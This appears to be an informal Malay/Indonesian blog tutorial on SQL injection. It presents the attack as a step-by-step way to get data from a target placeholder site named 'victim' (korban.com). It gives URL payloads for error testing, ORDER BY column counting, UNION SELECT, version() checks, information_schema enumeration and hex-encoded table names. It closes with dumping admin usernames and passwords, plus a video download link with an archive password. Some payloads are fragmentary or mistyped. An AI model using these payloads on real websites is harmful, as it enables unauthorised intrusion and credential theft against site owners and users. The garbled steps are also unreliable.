Sql injection?
Ya .. kali ini kita akan membahas sedikit mengenai sql injection, apa itu Sql Injection?
Sql injection adalah salah satu dari sekian banyak teknik seorang attacker untuk mendapatkan data-data penting dari sebuah website, contohnya user admin dan password. Ada beberapa macam teknik sql injection, tapi pada postingan kali ini, kita hanya akan membincangkan basicnya. Hehehe
Kenapa sebuah website mempunyai bug sqli?
Hmm .. sebuah website yang vurl terhadap sqli biasanya kerana kekurangan filtering atau adanya kesalahan coding oleh webmasternya, nah akibatnya client boleh melakukan perintah-perintah SQL melalui Url yang kemudian di eksekusi oleh databasenya. Yahh .. kurang lebih begitulah, maaf kalau salah Hehehe: D
Bagaimana melakukan Sql injection?
Pertama-tama, kita perlu mencari targetnya, menganggap target kita adalah
http://korban.com/berita.php?id=2
Kemudian kita cek apakah web itu terdedah terhadap sqli dengan cara menambah tanda petik ' pada akhir Url
Http :/ / korban.com / berita.php? Id = 2 '
apabila terdapat error bererti web tersebut boleh di SQLI
Setelah itu kita cari jumlah tablenya dengan perintah + order + by + dan - sebagai penutup perintahnya
Lakukan sampe error hilang, atau sebaliknya adanya error ..
Http :/ / korban.com / berita.php? Id = +2 + order + by +1- -
Http :/ / korban.com / berita.php? Id = +2 + order + by +2- -
Http :/ / korban.com / berita.pgp? Id = +2 + order + by +3- -
Http :/ / korban.com / berita.pgp? Id = +2 + order + by +4- -
Http :/ / korban.com / berita.pgp? Id = +2 + order + by +5- - << contohnya errornya hilang
Kerana errornya pada 5 bererti kita ambil sampai 4
Setelah itu kita gunakan perintah union untuk mencari angka yang show atau yang biasa saya panggil angka keramat, hehehe. .
Http :/ / korban.com / berita.php? Id = 2 + union + select +1,2,3,4 -
Contohnye angka yang keluar adalah angka 2, sekarang kita cek versi Mysqlnya dengan perintah version () atau @ @ version pada angka yang keluar tadi,
Http :/ / korban.com / berita.php? Id = 2 + union + select +1, version () ,3,4 -
Apabila versi 5 kita boleh meneruskan carian table dengan perintah information_schema akan tetapi kalau yang keluar versi 4, mending tinggalkan target ini kerana kita harus main tebak-tebakan nama table.
Selanjutkan kita cari nama table yang ada.
+ Table_schema = database () -
Sekarang perhatikan nama table yang keluar, contohnya nama table yang keluar adalah admin, members, berita. Dari table tersebut, sepertinya table admin mempunyai maklumat yang menarik. Untuk mengetahui data yang ada pada table tersebut kita harus cek colum yang ada terlebih dahulu, namun sebelumnya kita harus conver nama tablennya ke Hex (dump).
saya menggunakan laman Http :/ / hogehoge.tk / tool-i / untuk mengconvertnya
Hasilnya, admin> 61646d696e
Sekarang kita cek colum yang ada pada table admin
Perhatikan nama colum yang ada pada jadual admin, contohnya nama tablenya adalah username, password, id. Selanjutnya mari kita liat isi colum tersebut.
Binggooo kita dapat username dan passwordnya. Hehehehe
jika masih tidak faham boleh download video kat bawah ni.. tq
Download Video
password winrar: ikik
